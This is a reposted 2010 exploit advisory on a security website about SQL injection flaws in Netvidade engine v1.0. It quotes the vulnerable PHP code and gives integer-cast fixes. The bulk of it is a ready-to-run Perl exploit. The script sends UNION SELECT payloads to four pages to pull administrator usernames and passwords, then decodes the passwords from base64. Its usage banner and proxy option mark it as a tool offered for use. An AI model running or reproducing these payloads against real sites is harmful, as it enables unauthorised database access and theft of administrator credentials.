首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Netvidade engine v1.0 Multiple Vulnerabilities
来源:Inj3ct0r.com 作者:DNX 发布时间:2010-05-11  
==============================================
Netvidade engine v1.0 Multiple Vulnerabilities
==============================================

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use Getopt::Long;
use MIME::Base64;

#                               \#'#/
#                               (-.-)
#    ----------------------oOO---(_)---OOo----------------------
#    |               __             __                         |
#    |         _____/ /_____ ______/ /_  __  ______ ______     |
#    |        / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/     |
#    |       (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )      |
#    |      /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/       |
#    |      Security Research Division      /____/ 2o1o        |
#    -----------------------------------------------------------
#    |     Netvidade engine v1.0 Multiple Vulnerabilities      |
#    -----------------------------------------------------------
# [!] Discovered by.: pwndomina
# [!] Vendor........: http://www.netvidade.com
# [!] Detected......: 15.04.2010
# [!] Reported......: 06.05.2010
# [!] Response......: xx.xx.2010
#
# [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6
#
#                     3: if ($_GET['id']==0)
#                     4:         $lista_webtemp=$netvidade->lista_webtemp();
#                     5: else
#                     6:         $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']);
#
#                     The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212
#
#                     212: function lista_webtemp_categoria($id)
#                     213: {
#                     214: $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=$id";
#                     215: $a=$this->CORE->db();
#                     216: $res=$a->abrecursor($query);
#                     217: return $res;
#                     218: }
#
# [!] Bug...........: $_GET['id'] in concorrer.php near line 2
#
#                     2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']);
#
#                     The function lista_proposta() is in class/var/recrutamento.class.php near line 42
#
#                     42: function lista_proposta($id)
#                     43: {
#                     44: $query="select * from recrutamento_propostas where id=$id";
#                     45: $a=$this->CORE->db();
#                     46: $res=$a->abrecursor($query);
#                     47: return $res;
#                     48: }
#
# [!] Bug...........: $_GET[id] in detalhe.php near line 6
#
#                     6: $noticias=$a->lista_noticia_detalhe($_GET[id]);
#
#                     The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208
#
#                     208: function lista_noticia_detalhe($id)
#                     209: {
#                     210: $query="
#                     211: select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome
#                     212: from noticias a, noticias_categorias b, administradores c
#                     213: where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#                     214: ";
#                     215:
#                     216: $a=$this->CORE->db();
#                     217: $res=$a->abrecursor($query);
#                     218: return $res;
#                     219: }
#
# [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6
#
#                     6: $dados=$a->lista_newsletter($_GET[id]);
#
#                     The function lista_newsletter() is in class/var/newsletter.class.php near line 113
#
#                     113: function lista_newsletter($id)
#                     114: {
#                     115: $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=$id";
#                     116: $a=$this->CORE->db();
#                     117: $res=$a->abrecursor($query);
#                     118: return $res;
#                     119: }
#
# [!] Quick fix.....: in class/var/netvidade.class.php line 214
#
#                     - replace:
#                         $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=$id";
#
#                     - with:
#                         $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b  where a.categoria=b.id AND a.categoria=".(int)$id;
#
# [!] Quick fix.....: in class/var/recrutamento.class.php line 44
#
#                     - replace:
#                         $query="select * from recrutamento_propostas where id=$id";
#
#                     - with:
#                         $query="select * from recrutamento_propostas where id=".(int)$id;
#
# [!] Quick fix.....: in class/var/noticias.class.php line 213
#
#                     - replace:
#                         where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
#                     - with:
#                         where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1)
#
# [!] Quick fix.....: in class/var/newsletter.class.php line 115
#
#                     - replace:
#                         $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=$id";
#
#                     - with:
#                         $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON  a.id=c.id, newsletter_templates b where a.template=b.id  and a.id=".(int)$id;
#
# [!] Greetings.....: cih.ms and phact.in
#

if(!$ARGV[3])
{
  print "\n                             \\#'#/                          ";
  print "\n                             (-.-)                           ";
  print "\n   ---------------------oOO---(_)---OOo----------------------";
  print "\n   | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |";
  print "\n   |                discovered by pwndomina                 |";
  print "\n   |                     coded by DNX                       |";
  print "\n   ----------------------------------------------------------";
  print "\n[!] Usage: perl netvidade.pl [Host] [Path] [Target] <Options>";
  print "\n[!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1";
  print "\n[!] Targets:";
  print "\n       -t 1            webtemplate-categoria.php";
  print "\n       -t 2            concorrer.php";
  print "\n       -t 3            detalhe.php";
  print "\n       -t 4            newsletter_preview.php";
  print "\n[!] Options:";
  print "\n       -u [no]         User-Id";
  print "\n       -p [ip:port]    Proxy support";
  print "\n[!] Notes:";
  print "\n                       For the targets 2, 3 & 4 you can use -u option.";
  print "\n";
  exit;
}

my %options = ();
GetOptions(\%options, "t=i", "u=i", "p=s");
my $ua      = LWP::UserAgent->new();
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = "http://".$host.$path;
my $userid  = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"u"}) { $userid = "+where+id=".$options{"u"}; }

print "[!] Exploiting...\n\n";

if($options{"t"} == 1) { exploit1(); }
elsif($options{"t"} == 2) { exploit2(); }
elsif($options{"t"} == 3) { exploit3(); }
elsif($options{"t"} == 4) { exploit4(); }

print "\n[!] Exploit done\n";

sub exploit1
{
  my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores";
  my $res = $ua->get($url);
  check($res);
}

sub exploit2
{
  my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid;
  my $res = $ua->get($url);
  check($res);
}

sub exploit3
{
  my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*";
  my $res = $ua->get($url);
  check($res);
}

sub exploit4
{
  my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid;
  my $res = $ua->get($url);
  check($res);
}

sub check
{
  my $res = shift;
  my $content = $res->content;
  my @c = split(/\n/, $content);
  foreach (@c)
  {
    if($_ =~ /##(.*?)#(.*?)##/)
    {
      print $1.":".decode_base64($2)."\n";
    }
  }
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xitami / 5.0a0 Denial Of Servi
·Hyplay 1.2.0326.1 (.asx) Local
·Dolphin 2.0 (.elf) Local Danie
·WinXP SP2 Fr Download and Exec
·IDEAL Migration v4.5.1 Buffer
·Microsoft Windows Outlook Expr
·GeoHttpServer Remote DoS Vulne
·Apple Safari 4.0.5 parent.clos
·AVCON H323Call Buffer Overflow
·ESET Smart Security 4.2 / NOD3
·Zervit version 0.4 suffers fro
·TFTPGUI v1.4.5 Long Transport
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved